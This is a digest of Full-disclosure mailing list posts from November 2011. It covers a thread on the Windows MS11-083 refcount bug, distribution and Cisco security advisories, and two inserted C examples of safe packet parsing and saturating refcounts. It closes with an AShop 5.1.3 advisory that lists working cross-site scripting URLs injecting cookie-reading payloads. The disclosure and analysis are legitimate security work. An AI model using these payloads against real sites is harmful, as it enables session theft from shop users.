Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread xD 0x41
You could just google for IRC packs of win2k src ;)
I know I have a copy of it somewhere... actually tho, would not be
helpful tho, as it does not affect win2k.. so I guess there would be
some code there but not the code you want.

@george
and, ideally if 'years' ago existed for this exploit but, it does only
affect v6 and up , this is tested so xp/2k/2k3 not affected...
still, I know people are using other ways anyhow , and that's just how
botting is... one way dies, one takes its place :s
I guess we wait for the rls of this.. maybe!


On 10 November 2011 01:51, Darren Martyn wrote:
> Oddly enough, I was aware the kernel has to handle packets sent to "closed"
> ports, just was not thinking of HOW it handles them. I would love to see the
> code for that, and am planning to look at the same code on Linux so I can
> see exactly what the hell it does.
>
> On Wed, Nov 9, 2011 at 1:56 PM, Georgi Guninski wrote:
>>
>> On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
>> > http://technet.microsoft.com/en-us/security/bulletin/ms11-083
>> >
>> > "The vulnerability could allow remote code execution if an attacker
>> > sends a continuous flow of specially crafted UDP packets to a closed port 
>> > on
>> > a target system."
>> >
>> > Microsoft did it once again.
>> >
>> > - Henri Salo
>> >
>>
>> Imagine if you knew about this a few years ago...
>>
>> --
>> j
>>
>
>
>
> --
> My Homepage :D
>
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2011:168 ] apache

2011-11-09 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:168
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: November 9, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in apache:
 
 The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21,
 when used with mod_proxy_balancer in certain configurations, allows
 remote attackers to cause a denial of service (temporary error state
 in the backend server) via a malformed HTTP request (CVE-2011-3348).
 
 The fix for CVE-2011-3192 provided by the MDVSA-2011:130 advisory
 introduced regressions in the way httpd handled certain Range HTTP
 header values.
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348
 https://issues.apache.org/bugzilla/show_bug.cgi?id=51878
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 efa3019014628e3c480750c1f2004a7c  2010.1/i586/apache-base-2.2.15-3.5mdv2010.2.i586.rpm
 3087616095041b2a0ec35a4f07b0db39  2010.1/i586/apache-devel-2.2.15-3.5mdv2010.2.i586.rpm
 f64f79810c740c6ea48a62b6efaa2e57  2010.1/i586/apache-htcacheclean-2.2.15-3.5mdv2010.2.i586.rpm
 54193e742de9f3c09033686110dbcf12  2010.1/i586/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 5190c0b547fdabd83f11f2c0b3c4c59c  2010.1/i586/apache-mod_cache-2.2.15-3.5mdv2010.2.i586.rpm
 797c23a6d7bd773b56f12ef80e598bd3  2010.1/i586/apache-mod_dav-2.2.15-3.5mdv2010.2.i586.rpm
 2489ede1721764643b2942292de4e43a  2010.1/i586/apache-mod_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 32132cdd5a453e1d35b34ad86756469b  2010.1/i586/apache-mod_deflate-2.2.15-3.5mdv2010.2.i586.rpm
 bb94bf4569a6979b23bbf29e51172deb  2010.1/i586/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.i586.rpm
 c0465fd2bf450d8229c92ebd7b96e796  2010.1/i586/apache-mod_file_cache-2.2.15-3.5mdv2010.2.i586.rpm
 8fe0536c0567db805b18eee9b6fbae4c  2010.1/i586/apache-mod_ldap-2.2.15-3.5mdv2010.2.i586.rpm
 f9f7679d70d4c06573737e401c9efa56  2010.1/i586/apache-mod_mem_cache-2.2.15-3.5mdv2010.2.i586.rpm
 bb61c23cadc265c1182e4d08beaf6834  2010.1/i586/apache-mod_proxy-2.2.15-3.5mdv2010.2.i586.rpm
 724885ee3820d7b0ae7c20a188fb8c54  2010.1/i586/apache-mod_proxy_ajp-2.2.15-3.5mdv2010.2.i586.rpm
 2582960ff8ed44b516dba77a8ca3f79e  2010.1/i586/apache-mod_proxy_scgi-2.2.15-3.5mdv2010.2.i586.rpm
 54829077b157f55baa47bcb05769c039  2010.1/i586/apache-mod_reqtimeout-2.2.15-3.5mdv2010.2.i586.rpm
 2e977bb1f6a182a2c70912167265ce50  2010.1/i586/apache-mod_ssl-2.2.15-3.5mdv2010.2.i586.rpm
 a5bf2b114ee2d72336adce28811c3037  2010.1/i586/apache-modules-2.2.15-3.5mdv2010.2.i586.rpm
 83b2206a476ef960dd2267e42b2121af  2010.1/i586/apache-mod_userdir-2.2.15-3.5mdv2010.2.i586.rpm
 e5c81b0d5dee76dfe644188c719208fd  2010.1/i586/apache-mpm-event-2.2.15-3.5mdv2010.2.i586.rpm
 1f565927f0329db6a6dcbfc146862d7d  2010.1/i586/apache-mpm-itk-2.2.15-3.5mdv2010.2.i586.rpm
 9fe74c5aa75109bd04e60278d3ce4f27  2010.1/i586/apache-mpm-peruser-2.2.15-3.5mdv2010.2.i586.rpm
 3a253e811772ae2eeed3ed028bb05dec  2010.1/i586/apache-mpm-prefork-2.2.15-3.5mdv2010.2.i586.rpm
 ada4b77b392aa8a5b6c283d1d3394f19  2010.1/i586/apache-mpm-worker-2.2.15-3.5mdv2010.2.i586.rpm
 f777f009148573676e3bda6fa9d3472a  2010.1/i586/apache-source-2.2.15-3.5mdv2010.2.i586.rpm
 30b49a94b9485639515c5323a58a87b2  2010.1/SRPMS/apache-2.2.15-3.5mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 904ac3e39e1544ac03201c638f272461  2010.1/x86_64/apache-base-2.2.15-3.5mdv2010.2.x86_64.rpm
 48164409c194bc836764f105d332b9b2  2010.1/x86_64/apache-devel-2.2.15-3.5mdv2010.2.x86_64.rpm
 7f9ba9d3b24e352fd9c6dbb770d1c0e2  2010.1/x86_64/apache-htcacheclean-2.2.15-3.5mdv2010.2.x86_64.rpm
 bfc5629f34ceec77cc9f63cbacedec8b  2010.1/x86_64/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 e4f47be08c6bf1e1e12f8f8263014238  2010.1/x86_64/apache-mod_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 01f8ba996efc43df6e94cf3ba7b960ee  2010.1/x86_64/apache-mod_dav-2.2.15-3.5mdv2010.2.x86_64.rpm
 07b4081d62a107a075f1b2e13a505496  2010.1/x86_64/apache-mod_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 42dc96e272815486f57db1fc5b5006c3  2010.1/x86_64/apache-mod_deflate-2.2.15-3.5mdv2010.2.x86_64.rpm
 5ab4bcddcd345aee9938a53f8c66f652  2010.1/x86_64/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 8bc139a4c4ce0381292885d35e0dc9a8  2010.1/x86_64/apache-mod_file_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 d7add6101b8b2393c9e16bbe4570e474  2010.1/x86_64/apache-mod_ldap-2.2.15-3.5mdv2010.2.x86_64.rpm
 4276d115ba3061e90c55b3614fc094e9  2010.1/x86_64/apache

[Full-disclosure] [SECURITY] [DSA 2342-1] iceape security update

2011-11-09 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2342-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
November 09, 2011                      http://www.debian.org/security/faq
- -

Package: iceape
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3647 CVE-2011-3648 CVE-2011-3650 

Several vulnerabilities have been found in the Iceape internet suite, an
unbranded version of Seamonkey:

CVE-2011-3647

   "moz_bug_r_a4" discovered a privilege escalation vulnerability in
   addon handling.

CVE-2011-3648

   Yosuke Hasegawa discovered that incorrect handling of Shift-JIS 
   encodings could lead to cross-site scripting.

CVE-2011-3650

   Marc Schoenefeld discovered that profiling the Javascript code
   could lead to memory corruption.

The oldstable distribution (lenny) is not affected. The iceape package only
provides the XPCOM code.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-9.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.14-9.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk66tBAACgkQXm3vHE4uylq1UwCgiDFB6+fSacdq2NSfFdRlxPmL
LRAAnRSQRBdqlERh/5aQLQOj+tTpEdSX
=kBkz
-END PGP SIGNATURE-



[Full-disclosure] [SECURITY] [DSA 2341-1] iceweasel security update

2011-11-09 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2341-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
November 09, 2011                      http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3647 CVE-2011-3648 CVE-2011-3650 

Several vulnerabilities have been discovered in Iceweasel, a web browser
based on Firefox. The included XULRunner library provides rendering
services for several other applications included in Debian.

CVE-2011-3647

   "moz_bug_r_a4" discovered a privilege escalation vulnerability in
   addon handling.

CVE-2011-3648

   Yosuke Hasegawa discovered that incorrect handling of Shift-JIS 
   encodings could lead to cross-site scripting.

CVE-2011-3650

   Marc Schoenefeld discovered that profiling the Javascript code
   could lead to memory corruption.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.9.0.19-15 of the xulrunner source package.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-11.

For the unstable distribution (sid), this problem has been fixed in
version 8.0-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk66rcYACgkQXm3vHE4uylqo9QCgsdGqCrDS99Eqo1QHA3G/LyMP
/aQAoMGeYFbcebA+ulmKJi94hEYrnLql
=H/MJ
-END PGP SIGNATURE-



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Henri Salo
On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.

I am surprised about this, because Microsoft is definitely lagging some level 
of testing and change management in critical code. How many servers are people 
using without networking these days? We do talk about a remote execution 
vulnerability in something, which obviously might get unnoticed when we think of 
security audits, PCI and such. I wonder if the integrated firewall in Windows could 
block this, as Microsoft should do everything in their power to stop attacks in 
this security vulnerability.

Related picture: http://paste.nerv.fi/72975464-itbegins.jpeg

Best regards,
Henri Salo

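Dan Rosenberg's point quoted above, that a network stack has to receive the frame and parse the IP and transport headers before it can even decide a port is closed, as an added example that is not part of any post in this thread: a minimal IPv4/UDP receive path in C that bounds-checks every header field it reads and only then consults a socket table. The port table, the packet builder and the address values are constructed for illustration (the addresses are from the RFC 5737 documentation ranges); nothing here models the Windows code the thread discusses.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of the early receive path, decided before any socket is consulted. */
enum rx_verdict {
    RX_MALFORMED = 0,   /* dropped while walking the headers */
    RX_CLOSED_PORT,     /* headers parsed fine, but nobody listens: drop */
    RX_DELIVER          /* headers parsed fine and a socket is bound */
};

/* Constructed stand-in for the kernel's socket table: bound UDP ports. */
struct port_table { uint16_t ports[8]; size_t n; };

static int port_is_open(const struct port_table *t, uint16_t port)
{
    for (size_t i = 0; i < t->n; i++)
        if (t->ports[i] == port) return 1;
    return 0;
}

/* Walk an IPv4 datagram the way a stack must before it can say "closed
 * port". Every field is checked against the bytes actually received; each
 * of these checks is a place where a real stack can get it wrong. */
enum rx_verdict udp_rx(const uint8_t *pkt, size_t len,
                       const struct port_table *t, uint16_t *dport_out)
{
    if (len < 20) return RX_MALFORMED;                     /* no full IPv4 header */
    if ((pkt[0] >> 4) != 4) return RX_MALFORMED;           /* not IPv4 */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4u;
    if (ihl < 20 || ihl > len) return RX_MALFORMED;        /* options must fit */
    size_t tot_len = (size_t)pkt[2] << 8 | pkt[3];
    if (tot_len < ihl + 8 || tot_len > len) return RX_MALFORMED; /* truncated */
    if (pkt[9] != 17) return RX_MALFORMED;                 /* only UDP modelled here */

    const uint8_t *udp = pkt + ihl;                        /* UDP header now in bounds */
    size_t udp_len = (size_t)udp[4] << 8 | udp[5];
    if (udp_len < 8 || udp_len > tot_len - ihl) return RX_MALFORMED;
    uint16_t dport = (uint16_t)(udp[2] << 8 | udp[3]);
    if (dport_out) *dport_out = dport;

    /* Only at this point does "closed port" become knowable: all of the
     * parsing above ran for a packet aimed at a closed port as well. */
    return port_is_open(t, dport) ? RX_DELIVER : RX_CLOSED_PORT;
}

/* Build a constructed IPv4/UDP datagram into buf and return its length.
 * Checksums are left zero (UDP/IPv4 treats 0 as "no checksum"); the
 * example is about header walking, not checksum validation. */
size_t build_udp(uint8_t *buf, uint16_t dport, size_t payload_len)
{
    size_t total = 20 + 8 + payload_len;
    memset(buf, 0, total);
    buf[0] = 0x45;                                   /* IPv4, IHL = 5 words */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 64; buf[9] = 17;                        /* TTL, protocol UDP */
    buf[12] = 198; buf[13] = 51; buf[14] = 100; buf[15] = 1;   /* 198.51.100.1 */
    buf[16] = 203; buf[17] = 0;  buf[18] = 113; buf[19] = 55;  /* 203.0.113.55 */
    uint8_t *udp = buf + 20;
    udp[0] = 0x30; udp[1] = 0x39;                    /* source port 12345 */
    udp[2] = (uint8_t)(dport >> 8); udp[3] = (uint8_t)dport;
    udp[4] = (uint8_t)((8 + payload_len) >> 8);
    udp[5] = (uint8_t)(8 + payload_len);
    return total;
}

int main(void)
{
    struct port_table t = { {53, 123}, 2 };          /* constructed listeners */
    const char *names[] = { "malformed", "closed port", "deliver" };
    uint8_t buf[128];
    uint16_t port = 0;

    size_t n = build_udp(buf, 9999, 4);
    printf("udp/9999  : %s\n", names[udp_rx(buf, n, &t, &port)]);
    n = build_udp(buf, 53, 4);
    printf("udp/53    : %s\n", names[udp_rx(buf, n, &t, &port)]);
    printf("truncated : %s\n", names[udp_rx(buf, 25, &t, &port)]);
    return 0;
}
```

The verdict order matters for the defender: a truncated or oversized header is rejected before the port is ever read, so "closed port" traffic still exercises the whole parsing path, which is why host firewalls that filter earlier than the stack can matter for a bug like this.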


[Full-disclosure] Cisco Security Advisory: Cisco TelePresence System Integrator C Series and Cisco TelePresence EX Series Device Default Root Account Manufacturing Error

2011-11-09 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco TelePresence System Integrator C Series and Cisco TelePresence EX Series 
Device Default Root Account Manufacturing Error

Advisory ID: cisco-sa-2009-telepresence-c-ex-series

Revision 1.0

For Public Release 2011 November 9 16:00  UTC (GMT)
+-

Summary
===

Software that runs on Cisco TelePresence System Integrator C Series
and Cisco TelePresence EX Series devices was updated to include secure
default configurations beginning with the TC4.0 release. This change
was accompanied by the release of Cisco Security Advisory
cisco-sa-20110202-tandberg.

Due to a manufacturing error, Cisco TelePresence System Integrator C
Series and Cisco TelePresence EX Series devices that were distributed
between November 18th, 2010 and September 19th, 2011 may have the root
account enabled.

Information on how to identify affected devices is available in the
Details section of this advisory.

Information on how to remediate this issue is available in the
Workarounds section of this advisory.

This advisory is posted at:
 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2009-telepresence-c-ex-series

Affected Products
=

The following products are only affected if they were distributed
between November 18th, 2010 and September 19th, 2011 with software
release TC4.0, TC4.1, or TC4.2.

 

Vulnerable Products
+--

All Cisco TelePresence System Integrator C Series, Cisco TelePresence
EX Series, and Cisco TelePresence Quick Set products that were
distributed within the designated timeframe are potentially affected.
Administrators can determine the status of their device by using the
Serial Number Validator located at the following link:
http://serialnumbervalidation.com/PSIRT-20111026

The Serial Number Validator tool will indicate if the device was
affected when the product was shipped. If a factory reset or software
upgrade occurred or certain manual configuration changes were made,
the device may not be affected. 

Products Confirmed Not Vulnerable
+

Cisco TelePresence System Integrator C Series and Cisco TelePresence
EX Series devices that were distributed prior to November 18th, 2010
or after September 19th, 2011 are not affected by this vulnerability.
No other Cisco products are currently known to be affected.

Details
===

Cisco TelePresence System Integrator C Series and Cisco TelePresence
EX Series devices bring an immersive, interactive, and engaging
experience to person-to-person or group telepresence calls.

Default Root Account
+---

As the result of an error that occurred during the manufacturing and
distribution process, affected products may have been distributed with
an insecure configuration. The vulnerability is due to a failure to
return devices to default configurations after license/option
configuration and testing.

Affected devices may have the root account enabled and configured with
a well-known default password. This account is intended to be enabled
by device administrators when certain debugging actions need to be
performed and should be disabled by default.

Administrators may verify the configuration of affected devices by
using one of the following methods:

For devices that are running TC4.0 or 4.1 software, administrators may
view the serial number of an affected device by logging in to the
command line of an affected device with the admin account and issuing
the xstatus systemunit hardware command.

View Serial Number:
+--

ssh admin@203.113.55

Welcome to TANDBERG Codec Release TC4.1.0.247017 SW Release
Date: 2011-01-28

OK

systemtools xstatus producttype
*s SystemUnit Hardware Module SerialNumber: "ABC123456789"
*s SystemUnit Hardware Module Identifier: "05"
*s SystemUnit Hardware MainBoard SerialNumber: "ABC123456"
*s SystemUnit Hardware MainBoard Identifier: "101551-3 [05]"
*s SystemUnit Hardware BootSoftware: "U-Boot 2010.06-81"
** end

Determining the State of the Root Account:
+-

As the result of a functional defect that was introduced in software
release TC4.0, the systemtools rootsettings get command will always
return a value of off. To accurately determine the state of the root
account on devices that are running software release TC4.0 or TC4.1,
administrators should attempt to open an SSH connection to an affected
device as root.

Root Account Enabled:
+-

ssh root@203.0.113.55

[tandberg:~] $

Root Account Disabled:

ssh root@203.0.113.55

Password:
Password:
Password:

Permission denied (publickey,keyboard-interactive)

For devices that are running software release TC4.2, administrators
can view the serial number or status of the root accoun

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Dan Dart
> Joke: "Chuck Norris can exploit sockets that aren't even listening."

No... that's Bruce Schneier :P



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread GomoR
On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
[..]
> While I'd love to see an exploit from a purely academic perspective,
> it doesn't appear that this is the type of bug where exploitation is
> going to be reliable enough to support a worm.  The reference counter
> in question is most likely 32 bits, but even giving the benefit of the
> doubt and saying it's a 16-bit refcount, that's still 2^16 events
> (probably receiving a certain UDP packet) that need to be triggered
> precisely in order to cause a refcount overflow and then trigger a
> remote kernel use-after-free condition, which wouldn't be trivial to
> exploit even by itself.  On an unreliable network like the Internet,
> it seems unlikely that the kind of traffic volume required to trigger
> this bug could be generated without dropping a single packet.
> Reliable DoS seems more likely though.

I would love to hear about results running this exploit/PoC/whatever 
against a xBSD TCP/IP stack.

Microsoft Windows TCP/IP stack looks so BSDish to me since Windows Vista.

But that's probably because they "rewrote" it completely at that 
time (with integration of their "new" IPv6 stack also).

Joke: "Chuck Norris can exploit sockets that aren't even listening."

-- 
  ^  ___  ___ http://www.GomoR.org/  <-+
  | / __ |__/Senior Security Engineer  |
  | \__/ |  \ ---[ zsh$ alias psed='perl -pe ' ]---|
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Darren Martyn
Oddly enough, I was aware the kernel has to handle packets sent to "closed"
ports, just was not thinking of HOW it handles them. I would love to see
the code for that, and am planning to look at the same code on Linux so I
can see exactly what the hell it does.

On Wed, Nov 9, 2011 at 1:56 PM, Georgi Guninski wrote:

> On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
> > http://technet.microsoft.com/en-us/security/bulletin/ms11-083
> >
> > "The vulnerability could allow remote code execution if an attacker
> sends a continuous flow of specially crafted UDP packets to a closed port
> on a target system."
> >
> > Microsoft did it once again.
> >
> > - Henri Salo
> >
>
> Imagine if you knew about this a few years ago...
>
> --
> j
>
>



-- 
My Homepage :D 

[Full-disclosure] DC4420 - London DEFCON - November 2011 meet - Tuesday 15th November

2011-11-09 Thread Major Malfunction
Where:

   DOWNSTAIRS @ The Phoenix, Cavendish Square
   http://www.phoenixcavendishsquare.co.uk/

When:

  Tuesday 15th November, 2011
  17:30 until kicking out time

Why:

   Drinking and playing with awesome tech

Who:

   You
   Me
   THC (The Hackers Choice twitter:@hackerschoice)

What:

   THC are going to do a short talk about Enigma - they will be bringing 
a *real* Enigma machine with them

What else:

   More drinking

No really, what else:

   A shortish tech talk if someone gets one in to us in time

Greets:
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Georgi Guninski
On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
> http://technet.microsoft.com/en-us/security/bulletin/ms11-083
> 
> "The vulnerability could allow remote code execution if an attacker sends a 
> continuous flow of specially crafted UDP packets to a closed port on a target 
> system."
> 
> Microsoft did it once again.
> 
> - Henri Salo
>

Imagine if you knew about this a few years ago...

-- 
j



Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

2011-11-09 Thread Dave
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 09/11/2011 11:45, Dan Rosenberg wrote:
> On Wed, Nov 9, 2011 at 6:25 AM, Darren Martyn wrote:
>> Balls, I forgot to add this to the last message, but has anyone examined the
>> patch yet? I can only imagine it would be VERY interesting to look at...
>>  Or that it opens all UDP ports so that there are no closed ones to
>> exploit 
>>
> 
> Yet another bug class (refcount overflows) that the PaX Team
> eradicated years ago and everyone else is still scrambling to catch
> up.
> 
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.


Yes, I agree. The term "closed port" is somewhat misleading to those who have 
no idea of how a TCP/IP stack works.
What is surprising though is that this flaw exists in such a mature OS as 
Windows. But then again this is Microsoft we are talking about.




>> On Wed, Nov 9, 2011 at 11:22 AM, Darren Martyn wrote:
>>>
>>> So... Another Conficker type worm possible from this bug if everyone cocks
>>> up and fails to patch?
>>>
> 
> While I'd love to see an exploit from a purely academic perspective,
> it doesn't appear that this is the type of bug where exploitation is
> going to be reliable enough to support a worm.  The reference counter
> in question is most likely 32 bits, but even giving the benefit of the
> doubt and saying it's a 16-bit refcount, that's still 2^16 events
> (probably receiving a certain UDP packet) that need to be triggered
> precisely in order to cause a refcount overflow and then trigger a
> remote kernel use-after-free condition, which wouldn't be trivial to
> exploit even by itself.  On an unreliable network like the Internet,
> it seems unlikely that the kind of traffic volume required to trigger
> this bug could be generated without dropping a single packet.
> Reliable DoS seems more likely though.
> 
> -Dan
> 
>>> On Tue, Nov 8, 2011 at 10:10 PM, Nahuel Grisolia wrote:

 Kingcope, where's the exploit?

 :P

 On Nov 8, 2011, at 6:53 PM, Henri Salo wrote:

> http://technet.microsoft.com/en-us/security/bulletin/ms11-083
>
> "The vulnerability could allow remote code execution if an attacker
> sends a continuous flow of specially crafted UDP packets to a closed port 
> on
> a target system."
>
> Microsoft did it once again.
>
> - Henri Salo
>
>>>
>>>
>>>
>>> --
>>> My Homepage :D
>>>
>>
>>
>>
>> --
>> My Homepage :D
>>
>>
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTrp77rIvn8UFHWSmAQLAoAf/SQFShTXjNjfclb73hs4z/RajsNJfzl5x
PIdT7N5q57Uzem1c7rvRoIPwF/Uv3wyL5qpyjq7USO4X/VhswlXgjVM022NPkCRE
uRV5/rES2lvBM7CVpJo/virO9qoKOs4VGzZK1GNbGyiE4PeCvzFZvyrtGHyEALc9
rDX00ZCo31O1xVP9M6X7g0il82x5LcDGpNQ5GZRFhpwfEkJeIZOIb80j90Y17Gu2
3fSFmFIHQRWT2vx3gEEi6PgI3rquQWKgS2RMLdBGigTJX5Sq2vD9RjT26enpRl4V
NO9BEBVm9/zdebCQ4ahfPrv+M9IZGxak6sQ+SB+mMaoukSFz8cqWsA==
=VEn4
-END PGP SIGNATURE-

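Dan Rosenberg's reasoning quoted above, that a reference counter has to be driven through about 2^16 (or 2^32) precisely delivered events before it wraps and the kernel frees an object that is still in use, together with the PaX Team hardening he mentions, as an added example that is not part of any post in this thread: a toy object with a 16-bit reference counter, once in the plain wrapping form and once in a saturating form that refuses the final increment and pins the object instead of letting the count roll over. The object, its get/put API and the counter width are constructed for illustration and are not the Windows code the thread discusses.

```c
#include <stdint.h>
#include <stdio.h>

/* Toy object with a deliberately narrow counter, the "benefit of the doubt"
 * 16-bit case from the thread. Real kernels use 32-bit counters, which only
 * moves the same failure 2^16 times further out. */
struct obj {
    uint16_t ref;     /* live references; the object is freed when this hits 0 */
    int saturated;    /* set once the counter refused to grow: object is pinned */
    int freed;        /* set by obj_put when the count reaches zero */
};

/* Acquire a reference. In wrapping mode the counter silently rolls over at
 * 65535 + 1 == 0. In saturating mode (the idea behind PaX REFCOUNT and later
 * refcount_t) the increment is refused at the maximum and the object is
 * pinned for the rest of its life: a leak, not a use-after-free. */
static int obj_get(struct obj *o, int saturating)
{
    if (saturating && (o->ref == UINT16_MAX || o->saturated)) {
        o->saturated = 1;
        return 0;                     /* caller did not get a reference */
    }
    o->ref++;                         /* uint16_t arithmetic wraps modulo 2^16 */
    return 1;
}

/* Release a reference; free when the last one goes away. */
static void obj_put(struct obj *o)
{
    if (o->saturated) return;         /* pinned: never freed, never reused */
    if (--o->ref == 0) o->freed = 1;  /* last reference dropped -> free */
}

/* Take n_gets references, then drop exactly one (the creator's). Returns 1
 * if the object ended up freed while other holders still exist, i.e. the
 * use-after-free condition; *holders receives how many references remain. */
int freed_while_held(unsigned long n_gets, int saturating, unsigned long *holders)
{
    struct obj o = { 1, 0, 0 };       /* creator holds the initial reference */
    unsigned long held = 1;
    for (unsigned long i = 0; i < n_gets; i++)
        if (obj_get(&o, saturating)) held++;
    obj_put(&o);                      /* creator releases its reference */
    held--;
    if (holders) *holders = held;
    return o.freed && held > 0;
}

int main(void)
{
    unsigned long holders;
    int w = freed_while_held(65536UL, 0, &holders);
    printf("wrapping 16-bit refcount, 2^16 gets then one put: freed while held = %d"
           " (holders left = %lu)\n", w, holders);
    int s = freed_while_held(65536UL, 1, &holders);
    printf("saturating refcount,     2^16 gets then one put: freed while held = %d"
           " (holders left = %lu)\n", s, holders);
    return 0;
}
```

With the wrapping counter, 65536 successful acquisitions bring the count back to 1, so the creator's single release frees the object under 65536 live holders; with the saturating counter the last two acquisitions are refused, the object is pinned, and the release frees nothing. Every one of those 65536 acquisitions has to happen for the wrap to occur, which is the delivery-reliability argument in the quoted message.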


[Full-disclosure] Multiple security vulnerabilities in AShop 5.1.3

2011-11-09 Thread Schurtz, Stefan
Advisory:   Multiple security vulnerabilities in AShop 5.1.3
Advisory ID:INFOSERVE-ADV2011-02
Author: Stefan Schurtz
Contact:secur...@infoserve.de
Affected Software:  Successfully tested on AShop513
Vendor URL: http://www.ashopsoftware.com/
Vendor Status:  fixed in Version 5.1.4

==
Vulnerability Description:
==

AShop is prone to multiple security vulnerabilities. 

==
PoC-Exploit
==

Cross-Site-Scripting

IE8

http:///ashop/?'"alert(document.cookie)
http:///ashop/index.php?'"alert(document.cookie)
http:///ashop/picture.php?picture="
stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http:///ashop/index.php?language='"alert(document.cookie)

FF 7.1

http:///ashop/index.php?searchstring=1&showresult=true&exp='"